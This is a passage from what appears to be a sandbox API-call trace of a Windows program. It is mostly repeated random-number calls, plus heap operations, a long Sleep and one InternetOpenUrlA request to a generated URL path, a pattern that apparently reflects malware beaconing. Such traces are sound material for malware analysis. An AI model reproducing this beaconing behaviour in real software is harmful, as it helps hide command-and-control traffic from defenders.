lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.151] GetProcessHeap () returned 0x440000 [0258.151] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0258.151] lstrcpyA (in: lpString1=0x472f30, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0258.152] lstrcatA (in: lpString1="\x81\x03", lpString2="/35tgJzur0finj9vP152p34ujfqso/" | out: lpString1="\x81\x03/35tgJzur0finj9vP152p34ujfqso/") returned="\x81\x03/35tgJzur0finj9vP152p34ujfqso/" [0258.152] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0258.152] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/35tgJzur0finj9vP152p34ujfqso/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0258.152] GetProcessHeap () returned 0x440000 [0258.152] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0258.152] GetProcessHeap () returned 0x440000 [0258.152] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f4e30 | out: hHeap=0x440000) returned 1 [0258.152] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0258.153] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0258.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0258.153] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0258.153] Sleep (dwMilliseconds=0x1760a) [0258.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0258.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0258.271] GetProcessHeap () returned 0x440000 [0258.271] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02a50 [0258.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0258.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02a51, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a02a51) returned 0x0 [0258.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.274] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.274] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.274] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.275] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.275] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.275] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.275] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.276] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0258.276] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.276] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.277] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.277] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.277] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.278] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.278] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0258.278] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.278] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.279] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.279] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.279] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.279] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.280] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.280] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.280] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0258.280] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.281] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02a75, cbBuffer=0x1c, dwFlags=0x2 | out: pbBuffer=0x3a02a75) returned 0x0 [0258.281] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.281] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.281] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.281] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.281] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.281] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.282] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.282] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.282] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0258.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0258.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02a91, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x3a02a91) returned 0x0 [0258.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 